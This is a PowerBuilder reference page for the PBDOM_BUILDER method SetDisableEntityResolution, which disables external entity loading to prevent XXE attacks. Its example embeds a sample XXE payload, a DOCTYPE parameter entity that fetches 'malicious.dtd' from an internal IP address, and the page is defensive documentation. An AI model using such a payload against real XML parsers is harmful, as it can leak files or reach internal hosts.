SetDisableEntityResolution

Description

Disables the loading of external entities. This method helps users prevent the XML eXternal Entity (XXE) attack, by not loading the external entity referenced in the XML document.

Syntax

pbdom_builder_name.SetDisableEntityResolution(boolean bDisableEntityResolution)

Argument	Description
pbdom_builder_name	The name of a PBDOM_BUILDER object
bDisableEntityResolution	A boolean specifying whether to allow to load the external entity. True -- Not allowed to load the external entity. False -- (Default) Allowed to load the external entity.

Argument

Description

pbdom_builder_name

The name of a PBDOM_BUILDER object

bDisableEntityResolution

A boolean specifying whether to allow to load the external entity.

True -- Not allowed to load the external entity.

False -- (Default) Allowed to load the external entity.

Return value

None.

Examples

The code in this example attempts to disable the loading of an external entity referenced in the XML document.

pbdom_builder pbbuilder
string ls_xml

pbbuilder = create pbdom_builder
pbbuilder.SetDisableEntityResolution(true)

ls_xml = '<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM  "http://172.16.9.100/malicious.dtd"> %xxe;]><Something>test</Something>'

pbbuilder.buildfromstring( ls_xml)

Usage

The SetDisableEntityResolution method can be used to disable the loading of the external entity, so as to prevent any potential XML eXternal Entity (XXE) vulnerability.

For Apache Xerces C++ Parser, even when SetDisableEntityResolution is set to True, Xerces will still check if the URL exists and displays an error if the URL does not exist.

Prev	Up	Next
GetParseErrors	Home	PBDOM_CDATA Class

PowerBuilder Extension ReferencePBDOM_BUILDER

SetDisableEntityResolution

PowerBuilder Extension Reference
PBDOM_BUILDER